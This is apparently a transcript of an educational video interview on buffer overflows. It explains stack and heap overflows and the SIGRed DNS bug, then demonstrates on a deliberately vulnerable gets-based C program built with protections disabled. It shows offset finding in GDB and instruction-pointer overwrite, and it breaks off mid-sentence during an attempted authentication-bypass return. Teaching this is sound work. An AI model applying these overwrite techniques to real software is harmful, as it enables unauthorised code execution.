Buffer Overflow Hacking Tutorial (Bypass Passwords)

Captions
The point is that it shows us about how many bytes we want to send in as an attacker to overrun that buffer. I love that, because in all the demonstrations I've seen, people are just stuffing it until they somehow get an overrun, right? Which is great. I mean, you can use the pattern tool, where you create a pattern and then you cause a process to crash, and then a piece of that pattern shows up in the register, and then you can ask the tool how many bytes into the pattern that piece was, and it shows you; that's the buffer size, basically. But this is the more elegant way of doing it, I guess. So let's overwrite the return pointer with the address of system, and then a four-byte pad, and then finally the address of the shell. So why have a four-byte pad? Because I know someone's going to ask: we are returning to the system function. That is not how you call a function; you don't return to it, you call it. Look at that: access granted. So we successfully bypassed authentication. [Music] Now, one of the things I've learned in IT is that you can't stop learning. You've got to keep on improving your skills, keep on developing your skills, and Brilliant is a fantastic platform for that. It doesn't matter if you want to learn math, computer science, artificial intelligence or programming; they have fantastic content on their website. You're not just going to be reading a book, as an example, or watching videos; it's very interactive and you are involved in your learning. I highly recommend Brilliant. Use the link below to get a 30-day trial and a 20% discount, so go to https://brilliant.org/DavidBombal. I really want to thank Brilliant for their fantastic partnership and for sponsoring my channel. They really, truly are brilliant.
Hey everyone, it's David Bombal, back with a very special guest, Stephen. Welcome, Stephen, it's great to have you back. Just for everyone who hasn't seen our previous video, have a look at the link below. Stephen's talking about zero-day millions and how you can earn millions by finding a zero day. It was a fascinating story, with lots of cool stories in that video, so have a look at it if you're interested in learning more about Stephen. But Stephen, just for people who haven't seen our previous video or don't know who you are, tell us a bit about yourself and tell us about your channel. Yeah, great. My name, as David mentioned, is Stephen Sims. I'm an instructor with the SANS Institute and also the curriculum lead there for the offensive operations curriculum. I'm also a courseware author of a few of their courses, on things like advanced pentesting and exploit development. I live out in the Bay Area in California, and I've been doing bug hunting and exploit development for probably close to 20 years now. Time has flown, but it's a lot of fun. It's something where you never lose your interest, and you will never know everything. So tell us about your channel, because you started that not so long ago, right? Yeah, so I started it off like this: when I retire courseware content from a course through SANS, I'm like, well, this is content that I think people would still enjoy, even though we're moving it out. So I reached out to the community and said, hey, would you all like to see something like browser exploitation against Internet Explorer 11? And people said absolutely. So I started doing it that way and then continued down the advanced technical area, but it's branched out a bit; I just had one last Friday on hacking Google Cloud.
Yeah, so for everyone who's watching, we're going to cover, well, Stephen, tell us the topic that we're going to cover. I'll just say, you know, go and look at Stephen's channel for amazing content. Stephen is one of the OGs in this field. If you really, really want to learn, go and have a look at his channel, go and subscribe, go and show the love. But Stephen, what are we talking about today? Yeah, today we're just going to cover basic buffer overflows, and I think it's important to do that because even if you want to jump in at 2023 or 2024 and get into exploit development, you've got to understand the fundamentals, even if a lot of those types of attacks are mitigated in many cases. You were telling me offline that buffer overflows have been around forever. It's surprising that they're not dead now, but there's some news coming, right? Yeah, so I will always say that the golden years of exploitation were back in the 90s up into the mid 2000s, because there were no mitigations or security controls there preventing exploitation. Today, even if the vulnerability is still there, there are these mitigations that try to stop the actual exploitation from being successful, or even your shellcode execution. So I remember people saying all the way back in the 90s, like, the day of buffer overflow exploitation is coming to an end any day now, and here we are in 2023 and it's still possible. But yes, as you mentioned, there are some newer mitigations called Control-flow Enforcement Technology, or CET, as well as shadow stacks and other mitigations, that are even, I will say, the end of buffer overflows. The vulnerability is still there in the code, but the ability to actually exploit the vulnerability will pretty much be mitigated completely once these roll out. And if you're on the side of the fence where you don't want to see this stuff go away, it's still going to be some time, because the actual hardware, the 
processors themselves, have to support the mitigations. So they, they being Microsoft or other vendors, are not just going to flip the switch and make it so they break all of your apps, so it's going to be a while. So you mentioned Microsoft. Is that something that's built into Windows, or do you have to do something to enable it? Yeah, so on Windows it's part of something called Exploit Guard, which used to be called the Enhanced Mitigation Experience Toolkit, or EMET. Exploit Guard came out on Windows 10 at some point and it's still there on Windows 11. It's, I would say, a mitigation toolkit where the majority of the mitigations, and there are over 20, are turned off by default, almost all of them, because Microsoft doesn't want to turn everything on and potentially break your application. So it's up to an administrator to understand the effect that the mitigations will have, both on application performance and on breaking the app, depending on how it's coded. And is that available in Linux and macOS as well, or is it just a Microsoft thing? Yeah, most operating system vendors, all the big ones, have ways to turn this stuff on or off, but each is different in its own way. And what's holding it back? Is it the hardware or the applications? Yep, for CET and shadow stacks and stuff specifically, that's held back by the actual hardware, the processor architecture. That's great. So just for everyone who wants to learn, I mean, Stephen, it's important to learn this. Like you said, it's a basic building block that you need to know, right? So even though, as you say, this may stop soon, it's something that you need to learn, right? Yeah, and just because Microsoft might be implementing it doesn't mean that the IoT world and all these other things out there are supporting it.
So, I mean, I want to keep quiet now and let you take us on this road, so perhaps you can just start with a gentle introduction and then go hardcore into it. What is a buffer overflow? Why is it important? I just want to let you take us down this road. I know you said you've got some slides and stuff that you can share, so you take it away, Stephen. Yeah, great, thanks, and feel free to chime in and ask away. So yeah, I did put a few slides together. I want to show you two types of buffer overflows. The first one's going to be the most basic, ordinary one that you would see at any college that you attend, or in some security classes. The other one I will show you is going to be a more advanced one. It's just going to be a screenshot of some disassembly. This one I'll show, just because it's easy to digest, is from the SIGRed vulnerability that came out a couple of years ago that affected DNS, and that type of overflow is a heap overflow. So they're both buffer overflows, but one's on the stack and one's on the heap, and the second one I'll show you will be more real world. And then I also plan on, we'll see how it goes, jumping over into the command line, and we can try to take a look to see if we can see this in a debugger. But a buffer overflow, in its most basic form, is when you're dealing with a function that is being called. If that function needs to, say, copy a string, meaning a number of characters, into a buffer and interact with it within the program, at that point you have to allocate the appropriate amount of space to store this information. So, to take a step back, each function call that gets made gets its own stack frame. The stack is its own region of memory and, again, every function call gets a stack frame. Some functions will need a buffer and other ones don't need a buffer, so for the ones that need a buffer, you need to allocate memory on the stack, and it's a finite 
lifetime, because it's only going to be there during the function call itself. Once the function returns, that stack frame gets torn down; it's no longer needed. So if that function needs a buffer, you'll then have a memory copy operation. It could be one of many functions that actually copies the data from a source into the destination buffer, which in this case would be on the stack. So the problem comes in if there are no bounds checks, or if we're not checking the size, the number of bytes that are going to be copied into the buffer. Then it is possible for an attacker, or just a regular user inadvertently, to send more data into the buffer than there is space available, which means that overflow of information has to go somewhere. So what is it overwriting? You know, there's this saying, I think Einstein said it: you really know someone knows this stuff when they can explain it simply, and you just did that. I mean, I've been doing a lot of research on this, and you just explained it so nicely.
So on this slide it's going to be a very basic C program that has a buffer overflow vulnerability intentionally written into it. On the left side, where it says code, that would be the code segment. This is where the executable code is stored in memory while the program is running, while the process is up and running. And then over on the right, you see on the bottom right it says stack. That would be a different location in memory that is specifically there to store stack frames associated with the various function calls. So in the code on the left, you see that we're creating a buffer. We're calling it buffer, it's a character buffer, and we're setting it to 16 bytes, so 16 total bytes of memory have been allocated on this stack frame associated with this function called overflow. If we continue forward, we then have a function called strcpy, which is a banned function, and by that I mean it's antiquated, it's unsafe, and it should never be used anymore. But it's still out there in legacy code you will come across, so it still has to be supported. You see where it says strcpy, buffer: that is the destination first, which is that 16-byte buffer that'll be allocated over on the right. And then it says input1 is the source. input1 is going to be coming in from what we would call argument vector one. You might have heard of argv and argc; that's the argument vector and the argument count. argv[0] is always the program name, argv[1] would be the first argument that you pass in via the command line, and then if you have another argument, that would be argv[2]. Think about an example like ping. If you say ping, space, 127.0.0.1, ping is the program name, so that would be argv[0], and then your IP address, the loopback in that case, 127.0.0.1, is the address that we're pinging; that would be argument 1. So in this case, whatever the user types in as a command line argument is being taken and written via strcpy into that buffer that 
we allocated with 16 bytes. If you look at the very bottom, you can see we run this program called vuln program, and we're using Python to just send in 12 A's. You can see that those 12 A's are being written to memory, into that buffer. It's being written from the top downward, and that's what that arrow pointing down means. We've only written 12 bytes in this case, so we're not hurting anything, and you wouldn't realize yet that there's a vulnerability in this program, because the process is not going to crash. If we do this again, now you can see on the bottom we do a times 32, so we're writing 32 A's into a 16-byte buffer. You can see over on the right that we've overwritten everything else that was there, notably the return pointer. The function that we've called, in this case the overflow function, needs to know where to return control after it's done doing what it's supposed to do, and it does that by returning to the return pointer. There is a special instruction called call. If we're running this program in the main function, so we've just started up the program, and you hit this instruction that says call overflow, the call instruction takes the very next address, where execution would have continued, and pushes it onto the stack, so that once the function we've called finishes, it knows where to return control. In this case we've overwritten it with these A's, so the process would crash and we'd get this segmentation fault, where the instruction pointer, or program counter as it's also called, would show us 41414141, because the capital A in ASCII hex is 41. Is there a reason why we choose A, or is it just an arbitrary choice?
That's a good question, and there are multiple takes on that. One is that, hey, it's just the first letter of the alphabet, so why not? Another big part of that is, if you see your 41414141 showing up anywhere in the processor registers or in memory, you know that that's the data that you sent in, so it's kind of like a little signature. But the other reason is that 41414141 is typically in a virtual memory address range that is not mapped into the process. So if you ever try to read from that address, write to that address, or execute what's at that address, there's a good chance it's not mapped and it will just cause an instant crash. In all the examples I've seen it's A, so it's great to get a real explanation of that, rather than people just doing it for whatever arbitrary reason, so thanks. No worries. So that's it in its basic form. Again, if we start over real quick and just summarize: we start this program called vuln program. It wants an argument, so we just send it some A's. The main function is the very first function to execute once the process is created. You can see here that the main function calls a function called overflow. The overflow function allocates a 16-byte buffer on the stack, then strcpy copies whatever command line argument you sent in into that destination buffer on the stack. Well, since strcpy does not include a size argument limiting the number of bytes that are permitted to be written to the destination, we can send in as many as we want. And when we overrun that buffer, we're overwriting, in this case, something called the return pointer, which should be how this function knows where to send the process, the instruction pointer, once it's done, to continue execution like it should. But we've overwritten it with AAAA, causing it to crash. What the attacker wants to do next: we would attach to it with a debugger and start understanding it. If a mitigation such as address space layout 
randomization is not on, which it typically is, then we can statically set the return pointer overwrite position. So you see on the image here where it says return pointer. Previously we had AAAA, which caused it to crash because we tried to execute whatever's at memory address 41414141. In this case, we want to overwrite that return pointer with an address in virtual memory where we can send our data. So that buffer that was allocated, if we can get the address of that, then we can put our shellcode there, which is our payload that we want to have executed. Maybe you've heard of Meterpreter, or just command exec shellcode, or add a user; there are all different types of shellcode. The two big parts are: you've got your vulnerability, which you exploit to get control of the process, and then you've got the shellcode, which serves as your payload, which is what you want to execute once you do get control. So what we want to do is put our shellcode into that buffer and overwrite the return pointer with the address of where that shellcode is in the buffer. Then, when the process goes to return, we get our payload execution. That's the goal. Yeah, so that would be a very basic stack overflow, and as time has gone on, lots of different mitigations have been put into place to try to make it so you can't exploit this simple vulnerability. So it's not treating the root cause, it's treating the symptoms. The root cause is the bad coding; the symptoms are obviously these types of things that we're able to do. An example of a mitigation would be Data Execution Prevention. Now, this one came out way back in XP Service Pack 2, if we're talking about Windows, but it wasn't turned on by default for all processes because Microsoft didn't want to break your programs. What that would do in this case, if we overwrite the return pointer with the address of our shellcode on the stack, is break the exploit, because the permission that we need, 
which is execute, is turned off with DEP being on, Data Execution Prevention. So that's a pretty effective control. There are ways to get around it. It's like a cat and mouse game where, every time a new mitigation comes out, we try to figure out how to get around it or avoid it or disable it. Stephen, I always see examples where people are using C, and you're using C here again. Is there a reason why C is used rather than, say, Python? Yeah, great question. So these are low-level languages. You've got assembly, you've got C and C++; these are examples of low-level languages. Objective-C is another one. And these low-level languages are extremely powerful because you have direct access to processor registers, direct access to memory, and the power to allocate and deallocate memory and move memory around, those low-level operations. You've heard that saying, with great power comes great responsibility, or something similar to that. You have to be very careful if you're writing in a language like C, because there's no protection, there's no management of the memory that's being allocated and deallocated to protect you, the way there is in a higher-level language like C#. So that's kind of the reason behind it. And you might say, well, why would people use these low-level languages if they're dangerous? Because of the speed and power that you have. You might compile something and the compiler compiles it in a way that you don't like; maybe it's inefficient, or it's not allowing you to do something that you want to be able to do. So in C you can just create some inline assembly right there in your program and you can make it do what you want it to do. You can literally say, move this data from this register into this other register and pop this off the stack. It's very powerful. The higher-level languages manage memory for you and have other controls and protections to make it impossible, or virtually impossible, for 
those primitive or old-school types of attacks to be possible. I've heard a lot of people say you should use Rust rather than C when coding in production. Yeah, absolutely. Microsoft, I'm sure you've been watching, just recently, a couple of months back, I think it was Mark Russinovich or someone said, hey, if you're interested, check out the latest update. I think it was a preview version of Windows 10 or 11, and win32k.sys has some components that are now running in Rust. Historically you would see win32k.sys, which is probably C++; it's a driver. But then there's win32k.rs.sys, I think it was; that's the Rust version, or at least part of it has been rewritten in Rust. And the interesting thing about Rust is you get a lot of the speed and power that you need, but with the memory safety that you benefit from with the higher-level languages. There's a lot to it, though. It's going to take time. I mean, there are millions of lines of code in, let's say, the Windows operating system, so you can't just swap all that stuff out overnight. Another issue you run into is limitations with the language, because the language hasn't been around as long and it's not as mature. So something that works fine in C++ may not be possible in Rust, and they've got to work with the language developers to actually implement support. But if I was writing an application, based on your experience with exploit development and all of this, would you recommend developers today write in Rust when they can, rather than C? Yeah, absolutely, yeah.
Because, I mean, it's so nice to see this example, because you know you hear these messages saying learn Rust or program in Rust, but this is a really nice visual example of why you'd rather use Rust or Python, let's say, than C. And it's great that you've given us advantages and disadvantages of each. So sorry for taking us on this tangent, but that's great information, thanks. I always say in a classroom, and you've heard this before millions of times, if you have a question, there's a good chance 10 other people have that same question; you've got to be the one that raises a hand. But yeah, there are so many of the browsers and big applications, like Adobe Acrobat Reader and whatever editor, and then you've got email clients and the operating systems themselves, and of all these big applications, most of them are in C++. It's because of the power and speed that you get with that language. And now you're having to go and train a lot of legacy developers who have so much history and experience with C++; now they've got to learn a new language, and that's going to come with a set of challenges. I want to jump over to the command line in a little bit here and see if we can get ourselves into some trouble, so we'll see what we're able to make happen. But I want to show you one more example of a different type of overflow that I mentioned earlier, which would be a heap overflow. The heap is actually a different region of memory than the stack. When I say different regions, like the code segment, the stack segment, the heap segment, what that really means is you're carving out a different section in virtual memory that's specifically been reserved and allocated to support one specific thing. So the code segment is specifically there to hold the executable code associated with the process. In that case you can mark that region of memory with 
the execute permission being on, because it has to be on, but you don't want it to be writable, so you turn the write permission off. And then there are all the other segments, like the stack. To simplify what the stack is: the stack segment is a specific region of memory that is used for function calls. Every function call gets its own stack frame, which just means a small allocation reserved specifically for that function. It goes through something called a prologue at the beginning of the function, which sets up the stack frame, and then at the end of the function you go through an epilogue, which tears down the stack frame. That is all compiler-inserted code that you as a programmer don't need to care about. That stack memory, again, is for finite operations, for function calls; you get in, you get out. Now, when you talk about the heap, that's a more dynamic area of memory. Let me give you a good example to help you understand. Let's say that you're using Chrome and you're navigating the web, and you go to a website that's actually a PDF document, so you're now in your browser window viewing a 10-megabyte PDF document. The stack is not a good area of memory for that, because the stack is really closely tied to the code segment, where, again, as the process is running and functions are called, each function that gets called gets its own little stack frame, and that's just constantly going on in the background. The heap, on the other hand, would be a good place to store the memory associated with that PDF document that we're looking at, because its lifetime is not finite. The developer of a browser has no idea how long you're going to keep that window open. We need to let that memory stay in use and resident until the user goes to the URL bar and changes it to the Google home page. Then we free all of that memory that was being used up by the PDF document, so it can be recycled and reused by the process.
If I understand right, these can also be very big files, hence the example of a 10 meg PDF, or it could be 100 meg or something, right? Yeah. So the heap and the stack are both considered dynamic regions of memory that are able to grow, and therefore they don't play nicely together. You've got to keep them apart from each other because you don't want them colliding into each other. You'll typically see it where the stack and the heap are multiple gigabytes away from each other and growing towards each other, and they should never collide, or you'll see them growing away from each other; that's how Windows does it. So, again, the heap is for dynamically allocated memory that doesn't have a finite lifetime. The interesting thing about that, though, and this is another area where we're not going to go down the rabbit hole, is that vulnerabilities like type confusion and use after free are heap-related vulnerabilities. If you're familiar with programming, you know what a function does. We call a function; maybe we create a calculator function and it wants two arguments. Give it two numbers and it will multiply them together and return the product back to you. Again, the function's just taking those numbers, multiplying them, displaying the result and returning. That function call doesn't store or preserve anything that you just did; it's just a little template that you can call over and over again to do a very specific thing. You get in, you get out. With the heap, on the other hand, once memory is allocated, maybe we want to create an object. You've heard of object-oriented programming, I'm sure. So let's say you want to instantiate an instance of something called the dog class. With this dog class, to use a silly analogy, you can choose the breed of the dog and various attributes, such as the fur color, the size of the dog, the eye color of the dog. Those are all the attributes you can select, and then you've 
got the methods, or functions, like sit, roll over, lie down, speak. When you instantiate an instance of this dog, you can then reference that dog, the object, and say dog dot speak or dog dot sit, and that instance of that object will do those things you're telling it to do. You can instantiate as many instances as you want. This all lives out on the heap. It gets very complex, because something has to manage that memory and manage those objects. Take this vulnerability class called use after free, for example. If we're somehow able to trick the process into thinking that an object is no longer needed, and it destroys it and gives the memory back to the heap, what if the process still needs it? It goes to access that object that's supposed to be there and, oof, it crashes. So it gets very complex out there on the heap. Now, this example I'm going to show you, what we're looking at here, and I know it looks like a lot of junk, is a disassembled program, a small piece of a function of a disassembled executable. Specifically, it's dns.exe from Windows. What we're looking at is where the vulnerability from SIGRed resides, if you've heard of that vulnerability from a number of years ago. It was a very critical vulnerability because it affected DNS, which is a publicly accessible service, so obviously from an attacker's perspective that's very interesting. The researchers that discovered this vulnerability were from Check Point. On the left we've got a snippet of one function and on the right we've got a snippet of another function. The snippet on the right is called by the snippet on the left. So see, I'm using my mouse cursor, I know it's small, where it says call RR_AllocateEx. The little snippet on the right is RR_AllocateEx disassembled. So what does disassembled mean? When we've compiled a program, the kind that you double click on to get it to run, that's all in machine code, so 
it's basically hexadecimal, and that hexadecimal that you're looking at is opcodes and operands. That's what the processor uses. Obviously, for us that's not easy to read, a bunch of opcodes like 90 eb06 34 41; I mean, that's pretty crazy. So what a disassembler does is it takes those opcodes and disassembles them into their mnemonic representation, which is what you have here on the screen, called disassembly. It's still not easy to read; what we're looking at is very low level. This would be an example of x86 64-bit disassembled code. I put in some notes; the little bits of blue everywhere on the right are comments that I added. But I'm just going to really quickly show you what the issue here was. You can see down at the very bottom, call memcpy. memcpy is a function that has a size argument. So you would think, if it's got a size argument, we can specify the maximum number of bytes that are permitted to be written to the destination, preventing a buffer overflow. strcpy didn't have that option; there was no size argument. memcpy does, so how can there be a vulnerability? Let's talk about this, because this is where it gets complex. It's not what we're going to go into in depth here, but what gets complex is the calculation of that size argument, because oftentimes we can't statically specify what the size is, so it has to be calculated from something else, and that something else, unfortunately, is oftentimes user influenceable. That's a word: we can influence that calculation. Now, being able to influence that calculation can be quite complex, and that's where the research comes in. But what's going on here is there was a special DNS query type, and that DNS query type allowed you to do interesting things. Normally DNS runs over UDP port 53, but DNS can also run over TCP 53. That would allow us to increase the size and have, you know, ACK and SYN-ACK and stuff like 
that; it opens up some options. And this specific type of DNS query, through compression and other factors, allows you to massage or groom how much data ends up needing to be copied to a destination. So with this call to RR_AllocateEx, if you look towards the bottom on the right, it says call Mem_Alloc. That's the actual function that allocates the memory on the heap to store the data associated with this DNS query. So we've got to allocate memory to store the data associated with this DNS query coming in across a socket. The issue that happens here is, if you look, and maybe you can add in a little pointer here after the fact, it says movzx of dx into edi and movzx of cx into esi. dx and cx are two-byte processor registers. Two bytes, so 2 to the 16th power values, 65,535 max. Only the lower two bytes of these processor registers are being taken into consideration for the memory allocation. In other words, the maximum memory allocation can be 65,535; that's the max because of this vulnerability in the code. It should not be limiting it to only two bytes, but it is. And what happens is we get into trouble, because there's something called an integer overflow. If you've ever looked at an odometer and the odometer says 999999999, when you add 1 to that, what happens? It rolls over back to zero. Or does it really? Those digits roll over to zero, but it carries the 1 to the left, right? So that ends up becoming the issue. If we can cause an integer overflow, rolling over 2 to the 16th power back to zero again, the memory allocation that gets made, because it's only looking at the lower two bytes, ends up being really tiny. Meanwhile, if we go back to the caller, memcpy is what actually needs to copy the data to that destination buffer that's been allocated. memcpy takes in an unsigned 32-bit integer, so four bytes are taken into consideration, not just two. So you see where I'm going. What's going to happen there is memcpy 
will happily copy in way more than 2 to the 16th power to the destination buffer that wasn't capable of ever holding that much data, so it results in a heap overflow, and that's where we got into trouble here. And that occurred on the server, right? So the client was able to cause an overflow on the server? Yep, that was a server-side vulnerability. So as you can see just from that explanation, and I try to simplify it as much as possible, but just based on that information you can see how complex it is. Now I love how you're explaining this, Stephen. I mean, I can see number one that you train a lot of people, and number two you really understand this, because you're explaining it simply even though it's complex. I appreciate you doing that. Yeah, for sure, it's a lot of fun. I mean, even though a lot of these vulnerabilities end up getting mitigated, they get patched of course, but the folks at Microsoft like Matt Miller, who is the guy who wrote the original Meterpreter module, has worked at Microsoft for a long time now, he's one of the guys responsible for implementing and creating these mitigations that make those types of exploit techniques not possible. What I want to do now, if we have time to do so, is jump over to the command line and just take a look at what this would look like in the code. It might not let us do it, but we'll give it a shot. All right, so we're in the command line right now. I'm on just an Ubuntu virtual machine, and what I want to do is try to create a little program and intentionally cause it to have a buffer overflow vulnerability. Let's go with vuln, that sounds good, that's it, and then we use vim, and now we're going to go ahead and start coding it up. I'm probably going to add more than I need, but I don't want to have to deal with many compiler errors, so we'll just add in the appropriate support that we need. So stdio, and then I'll include a couple more, I don't know if I'm 
going to need them or not, but better to put them in than not. stdlib, close that out. So these are the headers that I need for this, and then I'm going to create a static password in here. You would never do this in the real world, but define a password, and we'll call it password, because that's a great password of course. And then I'm going to start the main function, so int main, int, and here's what I'm going to do: argc, that's the argument counter, and I talked about this a bit earlier, and then we'll also do argv. If you remember, argc is the counter, argv is the vector, and argv[0] is always the program name, so that's what we'll start with there. So let's jump into the main function here. I don't know what my ID is currently, let me see if I can check that real quick. So my ID is 1000, I should have guessed that. All right, so I'm going to say setuid, because what happens a lot of times is a process will drop your privileges, so I'm going to set it back. I probably don't need this. Normally this would be the case if I want to make sure it runs as root, but I'm not going to mess with that right now. So we've got the setuid, if that works for us. And then I'll say argc. I'm only putting this in to help you understand, if you're not familiar with C very well, like, the argument vector, because I'm sure you've seen, when you run a program, if it wants command line arguments it yells at you and says, hey, I want command line arguments, or maybe it doesn't like command line arguments. So this program, I'm going to make it so it doesn't want command line arguments, actually. So we'll skip the argument vector part, but I'll still put it in here. So char, and what I'm going to do here is say if the, actually that's not what I want. If the argument vector is greater than one, so I don't want any arguments in this program, so if the argument counter is greater than one, then I'm just going to give it a usage statement: printf 
there is no usage. Let's put that in there, and the reason, again, I'm putting that in there is because it should help you see kind of how the argument vector and counter work. Again, argv[0] is the program name, argv[1] would be the argument that you sent in, the very first one. I don't want any, so if somebody tries to send an argument I'm going to yell at them and say, hey, there's no usage. Not terribly exciting. I mean, keeping it simple, which is great. Yeah, so all right, we've got that knocked out, and then we can say, if that happens, we'll exit with one, meaning an error, and it will close out. So that's a little check to see if you sent in an argument, and now I'm just going to call the vulnerable function, or the function with the vulnerability, that I haven't created yet. I'm going to call it check password, checkpw, and it doesn't want any arguments. Return zero if we don't have any issues, and then close out. Next we've got to create the function with the vulnerability, so I'm going to create a function called checkpw, and then we go into this function. It's going to say printf please enter the password, and, yes, this is the vulnerability: I'm using the gets function. You should never use that function, because it doesn't have a size argument. So I'm saying gets(pw), and then inside of here we're going to say if string compare, the password is password, then call the granted function, and we haven't created that function yet. Else we're going to say printf access denied. I'll close that out. Let me just think here real quick. I'm gonna return zero and then close this function out. One more function, called granted, and this function will simply say, if you reach it, printf access granted, and then return zero, close that out, and that should be our whole program. So if we walk through that again, we've got the main function, which is the first thing that'll execute. It tries to set the uid back to 1000, which should be 
fine, and then it says if the argument counter is greater than one, meaning if someone entered in any argument, print out a message that says there's no usage and exit out with an error of one. Zero would be no error, one is an error, as a status code. Well, if there are no arguments, call the checkpw function. The checkpw function says please enter a password, gets pw, so it's going to prompt us on standard input to enter in a password. It comes in, it says go ahead and compare the password, which is basically just the string password, against what we sent in. If it's zero, meaning they were equal, if they matched, then call the access granted function, which will print out access granted; otherwise print access denied and return out. It's a pretty simple little program, but it's got a buffer overflow because this guy here doesn't have a size argument. So I've only allocated a very small buffer. Have I even done that yet? Let me see here. Nope, I forgot to do that. Glad I went through that and actually read through it, because it wouldn't have worked. I love it when people like yourself make mistakes, it's encouraging for the rest of us. 
Especially in very basic things like this. char pw, we're gonna make it a 100 byte buffer. All right, let's be good. All right, so there's a little program. Let's see if we can get it to compile now, that's going to be the question. It might block us, but we'll try. All right, I'm gonna make it just a 32-bit executable right now to keep things simple: gcc -m32. -m32 means compile as a 32-bit binary, but I'm gonna kill some mitigations that would otherwise be automatically added in. So I'm going to say -z execstack, which turns off DEP, and then also -fno-stack-protector, I think that's what it needs to be, that says turn off stack canaries. And then the program name is vuln.c, and we'll just call it vuln. It's going to yell at us. It says, did you mean -fno-stack... oh, I put in one extra hyphen. All right, did it compile? So it's yelling at us, it says there at the bottom the gets function is bad, don't use it. Well, we'll just ignore that. Let's see if it actually compiled, and it did, so it works as expected. Now we know there's a vulnerability. To show you that argument vector thing, if I try to enter an argument it's saying there's no usage, because I entered that in, and if you look at the disassembly it's really easy to spot that, and you know exactly where you are in the code because it's doing a little check. Now, we know this is a 100 byte buffer, so here's something cool I want to show you, which is how can you determine the buffer size through reverse engineering as opposed to just cramming in a bunch of data with a pattern or something like that. So what we could do is go into GDB. GDB is the GNU debugger, and it's a debugger that supports Fortran, C and C++, written by Richard Stallman many, many decades ago. It's a command line debugger that's not very friendly or intuitive, but there are things to help. You can get a front end to it, like a graphical front 
end with DDD or EDD, but we're using an extension called GEF, you can see it down at the bottom. That's an exploit development assistance tool that has a bunch of functionality that comes along with it, and it imports it into the debugger so we can take advantage of it. So I'm just going to say disassemble main. Now, I'm defaulting to something called the Intel disassembly syntax. GDB by default uses what's called AT&T syntax. Basically it swaps the operand positions and does some other things, but it doesn't really affect the behavior of the program, it's just how you as the person reversing would like to see the disassembly displayed, nothing more than that. So by looking in this disassembly some things stick out, like right there, exit. Well, we know what the exit function does, and we even put that in there, we said return zero and exit. puts, that's the put string function that just prints to the screen. So some things stick out pretty quickly as you're looking in here. There's that setuid, remember we tried to set the uid to 1000, so this 3e8 is very likely 1000 in hexadecimal being pushed onto the stack as an argument to the setuid function. Now this function checkpw, we know that that's the one that's got the vulnerability in it, because that's where I put the gets function call. So if we say disassemble checkpw and we scroll up here, there's that call to gets, and right above it, well, gets needs the destination address where it's supposed to write the data that we type in. It needs to know where to write it, so we have to give that to the gets function as an argument. This is how we're going to determine the buffer size. So this right here, it says ebp-0x6c, that ends up being our buffer size, because ebp is the extended base pointer, that's a stack register, and basically what it's saying there is take the address of the base pointer, which points to the base of the stack frame, minus the buffer size, and that's how it tells the gets function 
where to write the data, but for us it tells us the buffer size. So we could real quickly say something like shell python -c, and then I'll just say print, and then what was that size again? That was 6c, right? So print 0x6c, and let me close that out, and it says 108. So if you remember, the buffer size that we created was a hundred bytes, right, so there are other things that might be playing a role here, making it a little bit bigger, but the point is that shows us about how many bytes we want to send in as an attacker to overrun that buffer. I just want to interrupt you and say I love that, because all the demonstrations I've seen is people are just stuffing it until they somehow get an overrun, right? Which is great. I mean, you can use the pattern tool, where you create a pattern and then you cause the process to crash, and then a piece of that pattern shows up in the register, and then you can ask the tool how many bytes into the pattern was this piece of the pattern, and it shows you, like, that's the buffer size basically. But this is the more elegant way of doing it, I guess. So we're gonna say run, python -c, print A times, I'm going to put 100, so 100 A's, plus I'm going to put in BBBB plus CCCC plus DDDD, and the reason I'm doing this is because we know that if we see 41414141, that's A's; if we see 42424242, that's B's; if we see 43s, that's C's, you get where I'm going. So I'm going to run this. What I'm hoping for is that it crashes and we see some of those values appearing in the registers to help us. Let's see what happens. 
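The arithmetic in this step can be sketched in a few lines of Python. This is a minimal illustration rather than the exact commands typed in the video: the names `BUF_TO_EBP`, `payload` and `offset_of` are made up for the example, and it assumes the usual 32-bit x86 frame layout, where the 4-byte saved base pointer sits directly above the buffer region and the return pointer sits directly above that.

```python
import struct

# Distance from the start of the buffer to the saved base pointer,
# taken from the `ebp-0x6c` operand seen in the disassembly.
BUF_TO_EBP = 0x6C

# Marker payload from the walkthrough: 100 A's, then BBBB, CCCC, DDDD.
payload = b"A" * 100 + b"BBBB" + b"CCCC" + b"DDDD"


def offset_of(register_value: int) -> int:
    """Return how many bytes into the payload a register value starts.

    x86 is little endian, so the value is packed back into the byte order
    it had in memory before searching. Returns -1 if it is not present.
    """
    return payload.find(struct.pack("<I", register_value))


print(BUF_TO_EBP)             # 108
print(len(payload))           # 112
print(offset_of(0x42424242))  # 100 (BBBB starts right after the 100 A's)
print(offset_of(0x44444444))  # 108 (DDDD sits at the saved-base-pointer offset)
print(BUF_TO_EBP + 4)         # 112 (assumed start of the return pointer)
```

Under that layout assumption, a 112-byte payload stops just short of the return pointer, so four more marker bytes would be needed before a marker shows up in the instruction pointer.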
So right here it says 56556202, and we're at this interesting memory address. Something's obviously gone wrong here. You can see that the base pointer points to DDDD, and the instruction pointer points to this strange address. So what this is telling me is that I'm not seeing 41414141 or 42424242 or 43s or 44s showing up in the instruction pointer. If I successfully overwrite that return pointer, then the instruction pointer should be pointing to those values, because it tried to return to that as an address. So I'm going to run this again, but actually send in four more bytes, so plus EEEE. You run this again, and now look what it says: cannot access memory at 45454545. So the instruction pointer actually did return to that address as if it were real. So pretty neat, right? If we go back over to the slides here, what we essentially did is send in a bunch of data, and that return pointer down there is what we wanted to overwrite. So by cramming in enough data we eventually were able to overwrite it with our E's. So now we have control of the process, we can tell it to go wherever we want it to go. We should be able to get it to run a shell if I had shellcode or something like that. What I'm going to try and do, and see if it lets me, is maybe I can return back to the access granted function, somewhere I'm not supposed to be able to return to, to bypass authentication. The issue is I didn't compile this as a position independent executable, and it's got ASLR on, so it might not let us do this, but we'll give it a shot, we'll see what happens here. If I disassemble checkpw, these addresses should be pretty consistent. What I want to do is overwrite that return pointer with this address here, so that when it returns, it returns to the call to the granted function, allowing me to bypass authentication. See how that would work? So let's see if we can get it to work, though. I'm going to 
